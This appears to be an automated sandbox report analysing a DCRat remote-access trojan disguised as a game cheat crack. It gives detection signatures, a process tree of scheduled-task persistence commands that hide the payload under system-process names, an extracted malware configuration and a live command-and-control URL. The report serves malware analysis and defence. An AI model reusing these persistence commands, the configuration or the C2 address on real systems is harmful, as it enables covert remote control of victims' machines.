Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFAwChXSve.exe

Overview

General Information

Sample name:RFAwChXSve.exe
renamed because original name is a hash value
Original sample name:47CA55CDB30DB720D739BFB73504B928.exe
Analysis ID:1449910
MD5:47ca55cdb30db720d739bfb73504b928
SHA1:d0292acd8f617ce49e1830bd47e108c4c3f833e2
SHA256:4cc156f578777710f3ce0c217664b9830ddfcab407f0c6de0cae10d5501d1ca1
Tags:DCRatexe
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates files with lurking names (e.g. Crack.exe)
Creates processes via WMI
Drops PE files to the user root directory
Drops PE files with benign system names
Found direct / indirect Syscall (likely to bypass EDR)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Tries to detect debuggers (CloseHandle check)
Tries to detect virtualization through RDTSC time measurements
Tries to evade analysis by execution special instruction (VM detection)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Installs a global mouse hook
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Startup Folder File Write
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • RFAwChXSve.exe (PID: 6824 cmdline: "C:\Users\user\Desktop\RFAwChXSve.exe" MD5: 47CA55CDB30DB720D739BFB73504B928)
    • RobloxPlayerLauncher.exe (PID: 416 cmdline: "C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe" MD5: 938199CA646378B696716037AFC964BA)
      • RobloxPlayerLauncher.exe (PID: 7196 cmdline: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe --crashpad --no-rate-limit --database=C:\Users\user\AppData\Local\Temp\crashpad_roblox --metrics-dir=C:\Users\user\AppData\Local\Temp\crashpad_roblox --url=https://uploads.backtrace.rbx.com/post --annotation=RobloxChannel=production --annotation=RobloxGitHash=cd8f60aa5fd1b833d79957e664b9bd42f71216a2 --annotation=UploadAttachmentKiloByteLimit=100 --annotation=UploadPercentage=100 --annotation=format=minidump --annotation=token=a2440b0bfdada85f34d79b43839f2b49ea6bba474bd7d126e844bc119271a1c3 --initial-client-data=0x8b4,0x8b8,0x8bc,0x884,0x8c0,0x12c9d84,0x12c9d94,0x12c9da4 MD5: 938199CA646378B696716037AFC964BA)
    • AkrienPremiumCrackByHurminka.exe (PID: 7180 cmdline: "C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe" MD5: C4546882C186DC99C68501D0DB7FBB21)
      • AkrienPremiumCrack.exe (PID: 7292 cmdline: "C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe" MD5: 830511D481D3B0D9E73F8475159EBEE3)
      • AkrienCrack.exe (PID: 7308 cmdline: "C:\Users\user\AppData\Local\Temp\AkrienCrack.exe" MD5: F01B45525A3718CEEDFCC788392DFE50)
        • wscript.exe (PID: 7356 cmdline: "C:\Windows\System32\WScript.exe" "C:\Browserfont\ilq5gxa6sOuB.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
          • cmd.exe (PID: 7612 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Browserfont\hryZMJ.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • refdhcp.exe (PID: 7660 cmdline: "C:\Browserfont\refdhcp.exe" MD5: EF0F547DFEF34380202700FDEDDC1CC8)
              • schtasks.exe (PID: 7740 cmdline: schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Saved Games\RDMwYUvZPK.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7756 cmdline: schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Users\Default\Saved Games\RDMwYUvZPK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7772 cmdline: schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Saved Games\RDMwYUvZPK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7788 cmdline: schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 7 /tr "'C:\Browserfont\RDMwYUvZPK.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7804 cmdline: schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Browserfont\RDMwYUvZPK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7820 cmdline: schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 11 /tr "'C:\Browserfont\RDMwYUvZPK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7836 cmdline: schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 10 /tr "'C:\Users\user\Templates\RDMwYUvZPK.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7852 cmdline: schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Users\user\Templates\RDMwYUvZPK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7868 cmdline: schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 11 /tr "'C:\Users\user\Templates\RDMwYUvZPK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7884 cmdline: schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 11 /tr "'C:\Users\user\RDMwYUvZPK.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7904 cmdline: schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Users\user\RDMwYUvZPK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7920 cmdline: schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 10 /tr "'C:\Users\user\RDMwYUvZPK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7936 cmdline: schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 12 /tr "'C:\AkrienAntiLeak\SgrmBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7952 cmdline: schtasks.exe /create /tn "SgrmBroker" /sc ONLOGON /tr "'C:\AkrienAntiLeak\SgrmBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7968 cmdline: schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 7 /tr "'C:\AkrienAntiLeak\SgrmBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7984 cmdline: schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Browserfont\services.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 8000 cmdline: schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Browserfont\services.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 8016 cmdline: schtasks.exe /create /tn "servicess" /sc MINUTE /mo 7 /tr "'C:\Browserfont\services.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 8036 cmdline: schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 5 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\RDMwYUvZPK.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 8052 cmdline: schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\RDMwYUvZPK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 8068 cmdline: schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 8 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\RDMwYUvZPK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 8092 cmdline: schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 12 /tr "'C:\Users\user\RDMwYUvZPK.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 8108 cmdline: schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Users\user\RDMwYUvZPK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 8136 cmdline: schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 12 /tr "'C:\Users\user\RDMwYUvZPK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 8172 cmdline: schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 8188 cmdline: schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 6880 cmdline: schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 1196 cmdline: schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\windows photo viewer\en-GB\RDMwYUvZPK.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 3288 cmdline: schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Program Files (x86)\windows photo viewer\en-GB\RDMwYUvZPK.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • RDMwYUvZPK.exe (PID: 1068 cmdline: "C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe" MD5: EF0F547DFEF34380202700FDEDDC1CC8)
  • RDMwYUvZPK.exe (PID: 5904 cmdline: "C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe" MD5: EF0F547DFEF34380202700FDEDDC1CC8)
  • cleanup
{"SCRT": "{\"V\":\")\",\"T\":\"%\",\"0\":\"~\",\"i\":\"`\",\"I\":\"-\",\"1\":\"@\",\"c\":\"(\",\"N\":\",\",\"h\":\"<\",\"s\":\"#\",\"M\":\"^\",\"E\":\".\",\"6\":\"|\",\"3\":\"*\",\"L\":\">\",\"w\":\"!\",\"4\":\"$\",\"k\":\"_\",\"S\":\" \",\"m\":\";\",\"J\":\"&\"}", "PCRT": "{\"I\":\"$\",\"=\":\"~\",\"i\":\"`\",\"c\":\"^\",\"M\":\"(\",\"0\":\";\",\"y\":\"|\",\"X\":\"*\",\"S\":\"%\",\"6\":\".\",\"j\":\"&\",\"x\":\"!\",\"p\":\"@\",\"w\":\">\",\"b\":\",\",\"l\":\")\",\"f\":\" \",\"Q\":\"-\",\"e\":\"<\",\"D\":\"#\"}", "TAG": "", "MUTEX": "DCR_MUTEX-DcQgTA363OTSb28k0qRq", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://a0985805.xsph.ru/@=MGZkZzNmlTN", "H2": "http://a0985805.xsph.ru/@=MGZkZzNmlTN", "T": "0"}
SourceRuleDescriptionAuthorStrings
00000009.00000002.1917392588.0000000002D5C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    00000028.00000002.4191108963.0000000002C99000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_3Yara detected DCRatJoe Security
      00000028.00000002.4191108963.0000000002CC7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_3Yara detected DCRatJoe Security
        00000028.00000002.4191108963.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          00000026.00000002.2048959997.0000000002721000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            Click to see the 10 entries

            System Summary

            barindex
            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Browserfont\refdhcp.exe, ProcessId: 7660, TargetFilename: C:\Browserfont\services.exe
            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\RFAwChXSve.exe, ProcessId: 6824, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Browserfont\ilq5gxa6sOuB.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Browserfont\ilq5gxa6sOuB.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\AkrienCrack.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\AkrienCrack.exe, ParentProcessId: 7308, ParentProcessName: AkrienCrack.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Browserfont\ilq5gxa6sOuB.vbe" , ProcessId: 7356, ProcessName: wscript.exe
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: RFAwChXSve.exeAvira: detected
            Source: http://a0985805.xsph.ru/59f76ddc.php?naYPdddiZRB6w7di0cADh=W0seTdtj&1rZrAbBstq1paw=7HSDZSw4HaEhh8KAzAvira URL Cloud: Label: malware
            Source: http://a0985805.xsph.ruAvira URL Cloud: Label: malware
            Source: http://a0985805.xsph.ru/59f76ddc.php?k1z6lifha3Idda=zJqsGbE9fMU9rrosWdn6UVtijiQ1Xya&Tl=2I0f9g1TuQiyzAvira URL Cloud: Label: malware
            Source: http://a0985805.xsph.ru/@=MGZkZzNmlTNAvira URL Cloud: Label: malware
            Source: http://a0985805.xsph.ru/Avira URL Cloud: Label: malware
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeAvira: detection malicious, Label: VBS/Runner.VPG
            Source: C:\Browserfont\RDMwYUvZPK.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Browserfont\ilq5gxa6sOuB.vbeAvira: detection malicious, Label: VBS/Runner.VPG
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeAvira: detection malicious, Label: TR/ATRAPS.Gen2
            Source: C:\Browserfont\services.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Browserfont\Registry.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\AkrienAntiLeak\SgrmBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Browserfont\RDMwYUvZPK.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Browserfont\RDMwYUvZPK.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Browserfont\RDMwYUvZPK.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Users\Public\Videos\cmd.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Browserfont\refdhcp.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Browserfont\RDMwYUvZPK.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Browserfont\RDMwYUvZPK.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: 00000028.00000002.4191108963.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"SCRT": "{\"V\":\")\",\"T\":\"%\",\"0\":\"~\",\"i\":\"`\",\"I\":\"-\",\"1\":\"@\",\"c\":\"(\",\"N\":\",\",\"h\":\"<\",\"s\":\"#\",\"M\":\"^\",\"E\":\".\",\"6\":\"|\",\"3\":\"*\",\"L\":\">\",\"w\":\"!\",\"4\":\"$\",\"k\":\"_\",\"S\":\" \",\"m\":\";\",\"J\":\"&\"}", "PCRT": "{\"I\":\"$\",\"=\":\"~\",\"i\":\"`\",\"c\":\"^\",\"M\":\"(\",\"0\":\";\",\"y\":\"|\",\"X\":\"*\",\"S\":\"%\",\"6\":\".\",\"j\":\"&\",\"x\":\"!\",\"p\":\"@\",\"w\":\">\",\"b\":\",\",\"l\":\")\",\"f\":\" \",\"Q\":\"-\",\"e\":\"<\",\"D\":\"#\"}", "TAG": "", "MUTEX": "DCR_MUTEX-DcQgTA363OTSb28k0qRq", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://a0985805.xsph.ru/@=MGZkZzNmlTN", "H2": "http://a0985805.xsph.ru/@=MGZkZzNmlTN", "T": "0"}
            Source: http://a0985805.xsph.ruVirustotal: Detection: 7%Perma Link
            Source: http://a0985805.xsph.ru/Virustotal: Detection: 7%Perma Link
            Source: C:\AkrienAntiLeak\SgrmBroker.exeReversingLabs: Detection: 87%
            Source: C:\Browserfont\RDMwYUvZPK.exeReversingLabs: Detection: 87%
            Source: C:\Browserfont\Registry.exeReversingLabs: Detection: 87%
            Source: C:\Browserfont\refdhcp.exeReversingLabs: Detection: 87%
            Source: C:\Browserfont\services.exeReversingLabs: Detection: 87%
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeReversingLabs: Detection: 87%
            Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RDMwYUvZPK.exeReversingLabs: Detection: 87%
            Source: C:\ProgramData\RDMwYUvZPK.exeReversingLabs: Detection: 87%
            Source: C:\Recovery\RDMwYUvZPK.exeReversingLabs: Detection: 87%
            Source: C:\Users\Default\Saved Games\RDMwYUvZPK.exeReversingLabs: Detection: 87%
            Source: C:\Users\Public\Videos\cmd.exeReversingLabs: Detection: 87%
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeReversingLabs: Detection: 75%
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeReversingLabs: Detection: 52%
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeReversingLabs: Detection: 100%
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\RDMwYUvZPK.exeReversingLabs: Detection: 87%
            Source: C:\Users\user\RDMwYUvZPK.exeReversingLabs: Detection: 87%
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\RDMwYUvZPK.exeReversingLabs: Detection: 87%
            Source: C:\Windows\en-US\RuntimeBroker.exeReversingLabs: Detection: 87%
            Source: RFAwChXSve.exeReversingLabs: Detection: 84%
            Source: RFAwChXSve.exeVirustotal: Detection: 93%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 92.0% probability
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeJoe Sandbox ML: detected
            Source: C:\Browserfont\RDMwYUvZPK.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeJoe Sandbox ML: detected
            Source: C:\Browserfont\services.exeJoe Sandbox ML: detected
            Source: C:\Browserfont\Registry.exeJoe Sandbox ML: detected
            Source: C:\AkrienAntiLeak\SgrmBroker.exeJoe Sandbox ML: detected
            Source: C:\Browserfont\RDMwYUvZPK.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeJoe Sandbox ML: detected
            Source: C:\Browserfont\RDMwYUvZPK.exeJoe Sandbox ML: detected
            Source: C:\Browserfont\RDMwYUvZPK.exeJoe Sandbox ML: detected
            Source: C:\Users\Public\Videos\cmd.exeJoe Sandbox ML: detected
            Source: C:\Browserfont\refdhcp.exeJoe Sandbox ML: detected
            Source: C:\Browserfont\RDMwYUvZPK.exeJoe Sandbox ML: detected
            Source: C:\Browserfont\RDMwYUvZPK.exeJoe Sandbox ML: detected
            Source: RFAwChXSve.exeJoe Sandbox ML: detected
            Source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_dc91dcca-4
            Source: RFAwChXSve.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\version-d6abc3b106a04c5c-rbxInstallerPkgManifest[1].txtJump to behavior
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: AkrienPremiumCrackByHurminka.exe, 00000002.00000003.1761671972.0000000003891000.00000004.00000020.00020000.00000000.sdmp, AkrienCrack.exe, 00000005.00000003.1766614314.0000000004B76000.00000004.00000020.00020000.00000000.sdmp, AkrienCrack.exe, 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp, AkrienCrack.exe, 00000005.00000003.1765791785.0000000006241000.00000004.00000020.00020000.00000000.sdmp, AkrienCrack.exe, 00000005.00000000.1762362221.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp, AkrienCrack.exe.2.dr
            Source: Binary string: C:\buildAgent\work\ci_deploy_nbsninja_boot-x86_git\build.ninja\common\vs2019\x86\release\Installer\BootstrapperClient\BootstrapperClient.pdb source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.dr
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.dr
            Source: Binary string: serialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.dr
            Source: Binary string: .pdb /MT source: RFAwChXSve.exe, 00000000.00000003.1727884209.0000000003329000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B4A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,5_2_00B4A5F4
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeCode function: 5_2_00B5B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,5_2_00B5B8E0
            Source: C:\Browserfont\refdhcp.exeFile opened: C:\Users\user
            Source: C:\Browserfont\refdhcp.exeFile opened: C:\Users\user\Documents\desktop.ini
            Source: C:\Browserfont\refdhcp.exeFile opened: C:\Users\user\AppData
            Source: C:\Browserfont\refdhcp.exeFile opened: C:\Users\user\AppData\Local\Temp
            Source: C:\Browserfont\refdhcp.exeFile opened: C:\Users\user\Desktop\desktop.ini
            Source: C:\Browserfont\refdhcp.exeFile opened: C:\Users\user\AppData\Local

            Networking

            barindex
            Source: Malware configuration extractorURLs: http://a0985805.xsph.ru/@=MGZkZzNmlTN
